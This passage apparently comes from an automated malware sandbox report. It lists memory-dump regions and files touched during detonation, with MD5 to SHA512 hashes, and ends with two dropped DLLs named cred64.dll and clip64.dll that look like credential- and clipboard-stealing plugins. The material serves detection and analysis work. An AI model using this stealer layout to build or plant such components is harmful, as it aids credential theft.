memory/4848-255-0x0000000072C60000-0x0000000073410000-memory.dmp

memory/4232-263-0x0000000004160000-0x0000000004560000-memory.dmp

memory/1744-264-0x0000000072C60000-0x0000000073410000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bf009481892dd0d1c49db97428428ede
SHA1 aee4e7e213f6332c1629a701b42335eb1a035c66
SHA256 18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4
SHA512 d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

memory/2688-262-0x0000000005400000-0x000000000543C000-memory.dmp

memory/4232-265-0x00000000046A0000-0x0000000004F8B000-memory.dmp

memory/4848-261-0x0000000007E00000-0x0000000007F0A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bf009481892dd0d1c49db97428428ede
SHA1 aee4e7e213f6332c1629a701b42335eb1a035c66
SHA256 18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4
SHA512 d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bf009481892dd0d1c49db97428428ede
SHA1 aee4e7e213f6332c1629a701b42335eb1a035c66
SHA256 18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4
SHA512 d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

memory/3876-271-0x0000000072C60000-0x0000000073410000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bf009481892dd0d1c49db97428428ede
SHA1 aee4e7e213f6332c1629a701b42335eb1a035c66
SHA256 18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4
SHA512 d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

\??\pipe\LOCAL\crashpad_1300_BBJAIMEGLZXAZQTQ

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 bf009481892dd0d1c49db97428428ede
SHA1 aee4e7e213f6332c1629a701b42335eb1a035c66
SHA256 18236c88bc4fe576f82223cca595133aa3b4e5fd24ebac9fd515b70e6f403ab4
SHA512 d05515ff319b0b82030bc9d4a27f0432b613488f945d1dae8b8dfe73c64e651eb39f4141a5d2e157e2afb43dd1dd95b6611c1003ac4e2e80511e6c5cd7cfdf11

\??\pipe\LOCAL\crashpad_2928_RRXRNKBMSIRFIRKK

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3144-298-0x0000000008300000-0x0000000008316000-memory.dmp

memory/1536-299-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4232-304-0x0000000000400000-0x000000000266D000-memory.dmp

memory/1344-306-0x00007FF625030000-0x00007FF6255D1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\18b419f7-abeb-475d-8f10-9a23551a46ff.tmp

MD5 06fb14113cbe660e63b6ad252ff1c577
SHA1 9a4b3fa83dc256e18346a99bbc5d5c1fa294548e
SHA256 fe5cfd0a92b5090d537ff0701189adedd7479bebbade499acbecdea5ff8db04f
SHA512 b5f1de18d7a4466e0b4d7b8322a1d04946c7b6fa6838c562e2c515da137be7336e5f51754bf0f1c46a00c54c08cd3068de4d5e6c0aaa8fe953737310052b2a3b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\306eeef8-ace1-45cd-bf65-c91a34dd4588.tmp

MD5 2df73a1fee08f2b8730df74fd34d6013
SHA1 fd7c910dda63589a50a445cb6a6a29d1f97cf2b6
SHA256 0f6d9ff191c379a3e7578b35671cba6ee60cb110650ec85b6bd5c6f773198e82
SHA512 fb88b7a7feba7579548292e2df3111cb335c6197a49307597b113509789319c5d7bae74cb39c8fa6288660fe42e08d25ee7a0845fa290f444f40d0837bb1e9c7

memory/4232-342-0x0000000000400000-0x000000000266D000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 62998a68faa7da80128d823fe0db8536
SHA1 4645e71b3aa216ed1e5e8ca04ebdd629e53dd04f
SHA256 d655fde882593214d29a3b4554aa7e59dd7474a9a5be280f2284b328f9502b1c
SHA512 62ad24e6a690ea8e986dae5c443d2cc58a4cdac28fc1c493fafd7d084e0689716d53ebe987f0f532cec05a7cccc270ef547c59d4785704210e5e0bcd56d0bb8a

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 43dcaefef99b8c0e590dfdda8c4512fb
SHA1 1030fb9466303571642b2c6e61153a7f8080ef96
SHA256 8086756e97f32a68377783fb803d169ce727cc89657a73ff66e86b88db05db2d
SHA512 f19f7cc0e7dd8047b6b611d3585852171a0d85d0510730d4310e1a68b628d529ef6c211a92d3852a06e55d2b6f1bd6ff10f146b3b7aab00b49332020494dd8ac

memory/3692-384-0x0000000005FA0000-0x0000000005FB5000-memory.dmp

memory/3692-386-0x0000000005FA0000-0x0000000005FB5000-memory.dmp

memory/3692-394-0x0000000005FA0000-0x0000000005FB5000-memory.dmp

memory/3692-392-0x0000000005FA0000-0x0000000005FB5000-memory.dmp

memory/3692-390-0x0000000005FA0000-0x0000000005FB5000-memory.dmp

memory/3692-388-0x0000000005FA0000-0x0000000005FB5000-memory.dmp

memory/3692-383-0x0000000005FA0000-0x0000000005FB5000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 0273aca126a593d98a5ab4557b28e5c2
SHA1 997e437a43a267970a2bfdbef8decf3549c9119f
SHA256 ff222ff6ae044984e6c4ff23731237a255ecf96306d992ba6582ca76d91f5be4
SHA512 1793b20f1cac363f4919b6aede6cf0a7a28cba9133ace1dcc9b534e5e2bdab40b2fce5253f7b2a3cc069462e4aa81416385c2bc58c1361739282276d5bf856a4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 25ac77f8c7c7b76b93c8346e41b89a95
SHA1 5a8f769162bab0a75b1014fb8b94f9bb1fb7970a
SHA256 8ad26364375358eac8238a730ef826749677c62d709003d84e758f0e7478cc4b
SHA512 df64a3593882972f3b10c997b118087c97a7fa684cd722624d7f5fb41d645c605d59a89eccf7518570ff9e73b4310432c4bb5864ee58e78c0743c0c1606853a7

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lmvyni4y.ltz.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\tmp16DA.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmp1700.tmp

MD5 9a24ca06da9fb8f5735570a0381ab5a2
SHA1 27bdb2f2456cefc0b3e19d9be0a0dd64cc13d5de
SHA256 9ef3c0aca07106effa1ad59c2c80e27225b2dd0808d588702dcf1a24d5f5fe00
SHA512 dd8ef799db6b1812c26ddc76b51e0ea3bbd5acde4e470a5e1152868e1aa55aa83b7370486f2d09158ffeda7dc8d95a2b071fe6bd086118efdb2b0d361cbf5183

C:\Users\Admin\AppData\Local\Temp\tmp17F6.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmp1812.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tmp180C.tmp

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

C:\Users\Admin\AppData\Local\Temp\tmp184D.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7b0a0a1eed0fff13dad4a424e4e1fc79
SHA1 6bffb11f38b0e30e3f63d501db22ef163675ea5c
SHA256 81678ebc2e2ad9a830a32f64130e1419aacca89a9b067c52a3c8d2e0957590ba
SHA512 a113b99dbfcb6186731437f129de5f21f913eb989c8e0f414c9e350d93aa9aafac1f43e11a2d708711e65b381f21b444043132e3038a190ecf3c929ed8a9565f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 39646c0480dd3c334b3a7e2eba256afa
SHA1 bd721cb251db16ef7e0d39b42b56790b549d4a63
SHA256 c0a5b882c6cbf5cbafe13e7418c9e78c160621fe678b2efd53d5a9b2f038223c
SHA512 1efbeede0fb45d3aff5291b42033e0b4ddf758905f8808e3d0ef80f1d848d7135139c30feb57cae1c5d0559a936d692533ca044636c45e0384d4e800cd7e63aa

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe5936a6.TMP

MD5 4fff27990d4b751ce0f94df7bd690826
SHA1 7847e42ae3e9779ff05bdfb937686654b0e49c86
SHA256 079e1bf3b1ee22976d05e3cd2c8e151af1e3452bbc2e5dd0c00002ae62c270ac
SHA512 792cb3fbae5c5f459830022db04001880021e8432801bd1af387dbb06f272fd0fb679b20fe1aea4c8152b1063b2b82f0513420c09c5747a42afc9fe27690958b

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4